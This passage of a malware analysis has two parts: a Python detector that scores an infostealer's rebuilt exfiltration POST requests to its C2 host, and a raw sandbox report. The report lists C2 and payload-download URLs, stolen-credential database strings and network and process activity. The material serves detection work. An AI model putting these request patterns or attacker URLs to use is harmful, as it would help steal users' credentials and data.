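    lines = ["POST /api HTTP/1.1", "Connection: Keep-Alive", f"Content-Type: {ctype}"]
    if cookie:
        lines.append(f"Cookie: {cookie}")
    lines += [f"User-Agent: {UA}", f"Content-Length: {length}", "Host: platformcati.sbs"]
    return "\r\n".join(lines) + "\r\n\r\n"


# Constructed from the report, in the order the sandbox listed the requests:
# an 8-byte form POST with no cookie (answered by Cloudflare's 403), then
# cookie-bearing form and multipart POSTs, the largest 553130 bytes.
CAPTURED_REQUESTS = [
    _request("application/x-www-form-urlencoded", 8, None),
    _request("application/x-www-form-urlencoded", 42, COOKIE),
    _request(f"multipart/form-data; boundary={BOUNDARY}", 12839, COOKIE),
    _request(f"multipart/form-data; boundary={BOUNDARY}", 15071, COOKIE),
    _request(f"multipart/form-data; boundary={BOUNDARY}", 20396, COOKIE),
    _request(f"multipart/form-data; boundary={BOUNDARY}", 2451, COOKIE),
    _request(f"multipart/form-data; boundary={BOUNDARY}", 553130, COOKIE),
    _request("application/x-www-form-urlencoded", 77, COOKIE),
]

WEBKIT_BOUNDARY_PREFIX = "----WebKitFormBoundary"  # assumption: what a real Chrome emits
MIN_BOUNDARY_REUSE = 3       # assumption: browsers pick a fresh boundary per request
MIN_UPLOAD_BYTES = 100_000   # assumption: volume worth calling exfiltration


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.1 request-head parser: request line plus a header map
    (names lower-cased; a repeated header keeps its last value)."""
    head, _, _body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def boundary_of(content_type: str) -> Optional[str]:
    """Boundary parameter of a multipart/form-data Content-Type, else None."""
    media, *params = [p.strip() for p in content_type.split(";")]
    if media.lower() != "multipart/form-data":
        return None
    for param in params:
        key, _, value = param.partition("=")
        if key.strip().lower() == "boundary":
            return value.strip().strip('"')
    return None


def analyse(raw_requests) -> dict:
    """Score one client's requests for the pattern seen here: POST-only
    traffic to a single path, a multipart boundary reused across uploads
    under a browser User-Agent, and a large total upload volume."""
    reqs = [parse_request(r) for r in raw_requests]
    targets = Counter((r["headers"].get("host", ""), r["path"]) for r in reqs)
    boundaries = Counter()
    fake_browser_boundary = False
    bytes_uploaded = 0
    for r in reqs:
        h = r["headers"]
        if r["method"] == "POST":
            bytes_uploaded += int(h.get("content-length", "0"))
        b = boundary_of(h.get("content-type", ""))
        if b is not None:
            boundaries[b] += 1
            if "Chrome/" in h.get("user-agent", "") and not b.startswith(WEBKIT_BOUNDARY_PREFIX):
                fake_browser_boundary = True
    reused = {b: n for b, n in boundaries.items() if n >= MIN_BOUNDARY_REUSE}
    post_only_single_path = len(targets) == 1 and all(r["method"] == "POST" for r in reqs)
    findings = []
    if reused:
        findings.append("multipart boundary reused across uploads: "
                        + ", ".join(f"{b} x{n}" for b, n in reused.items()))
    if fake_browser_boundary:
        findings.append("Chrome User-Agent but non-WebKit multipart boundary")
    if post_only_single_path:
        findings.append("POST-only traffic to a single path, no page load")
    if bytes_uploaded >= MIN_UPLOAD_BYTES:
        findings.append(f"{bytes_uploaded} bytes uploaded")
    return {
        "bytes_uploaded": bytes_uploaded,
        "reused_boundaries": reused,
        "fake_browser_boundary": fake_browser_boundary,
        "post_only_single_path": post_only_single_path,
        "findings": findings,
        "suspicious": bool(reused) or (fake_browser_boundary and bytes_uploaded >= MIN_UPLOAD_BYTES),
    }


if __name__ == "__main__":
    for line in analyse(CAPTURED_REQUESTS)["findings"]:
        print(line)
```

The boundary test is the one that survives a domain change: the ET signatures above key on the domain and on the request shape, but a fresh C2 host with the same client code still sends the same fixed boundary under a browser User-Agent. The byte count (604014 for this run) is only a tie-breaker, since a first check-in before any theft is small by design.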
Source: h226x41CQ6.exe | String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: h226x41CQ6.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: h226x41CQ6.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: h226x41CQ6.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: h226x41CQ6.exe | String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: h226x41CQ6.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: h226x41CQ6.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: h226x41CQ6.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: h226x41CQ6.exe | String found in binary or memory: http://ocsp.digicert.com0
Source: h226x41CQ6.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: h226x41CQ6.exe | String found in binary or memory: http://ocsp.entrust.net02
Source: h226x41CQ6.exe | String found in binary or memory: http://ocsp.entrust.net03
Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.10.dr | String found in binary or memory: http://upx.sf.net
Source: h226x41CQ6.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: h226x41CQ6.exe | String found in binary or memory: http://www.entrust.net/rpa03
Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdve
Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://itsrevolutionmagnus.xyz/
Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://itsrevolutionmagnus.xyz/Pa/
Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001245000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://itsrevolutionmagnus.xyz/Shnnfd.exe
Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001245000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://itsrevolutionmagnus.xyz/Shnnfd.exe%
Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://itsrevolutionmagnus.xyz/a
Source: h226x41CQ6.exe, 00000004.00000003.1528684635.0000000003B53000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528737340.0000000003B5C000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://platformcati.sbs/
Source: h226x41CQ6.exe, 00000004.00000002.1632344310.000000000122D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://platformcati.sbs/#HX
Source: h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://platformcati.sbs/S
Source: h226x41CQ6.exe, 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1595467129.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1588501158.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528754817.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632554277.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1618718716.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1633234944.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1584407261.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632344310.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1584530133.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://platformcati.sbs/api
Source: h226x41CQ6.exe, 00000004.00000002.1632554277.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://platformcati.sbs/api(w
Source: h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://platformcati.sbs/api?
Source: h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://platformcati.sbs/apieI
                Source: h226x41CQ6.exe, 00000004.00000003.1595467129.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632554277.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1618718716.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/apip
                Source: h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/apiz
                Source: h226x41CQ6.exe, 00000004.00000003.1557986513.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1543311993.00000000012BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/api~
                Source: h226x41CQ6.exe, 00000004.00000003.1293612240.00000000012BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/h
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&r
                Source: h226x41CQ6.exe, 00000004.00000003.1276217252.0000000001227000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276129508.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276129508.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1279584582.0000000001266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: h226x41CQ6.exeString found in binary or memory: https://www.entrust.net/rpa0
                Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49838 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49849 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49860 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49871 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49892 version: TLS 1.2
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 260
Source: h226x41CQ6.exe | Static PE information: invalid certificate
Source: h226x41CQ6.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: h226x41CQ6.exe | Static PE information: Section: .data ZLIB complexity 0.9944528978924418
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/5@2/1
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7260
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0f0d0a88-6921-446b-ad7f-35074b523590
Source: h226x41CQ6.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: h226x41CQ6.exe, 00000004.00000003.1294984513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B58000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1529897506.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1529302604.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: h226x41CQ6.exe | Virustotal: Detection: 79%
Source: h226x41CQ6.exe | ReversingLabs: Detection: 86%
Source: C:\Users\user\Desktop\h226x41CQ6.exe | File read: C:\Users\user\Desktop\h226x41CQ6.exe
Source: unknown | Process created: C:\Users\user\Desktop\h226x41CQ6.exe "C:\Users\user\Desktop\h226x41CQ6.exe"
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Process created: C:\Users\user\Desktop\h226x41CQ6.exe "C:\Users\user\Desktop\h226x41CQ6.exe"
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 260
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Process created: C:\Users\user\Desktop\h226x41CQ6.exe "C:\Users\user\Desktop\h226x41CQ6.exe"
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Section loaded: ondemandconnroutehelper.dll
Source: h226x41CQ6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: h226x41CQ6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: h226x41CQ6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: h226x41CQ6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: h226x41CQ6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: h226x41CQ6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: h226x41CQ6.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: h226x41CQ6.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: h226x41CQ6.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: h226x41CQ6.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: h226x41CQ6.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: h226x41CQ6.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: h226x41CQ6.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: h226x41CQ6.exe | Static PE information: section name: .ball
Source: h226x41CQ6.exe | Static PE information: section name: .ball
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\h226x41CQ6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
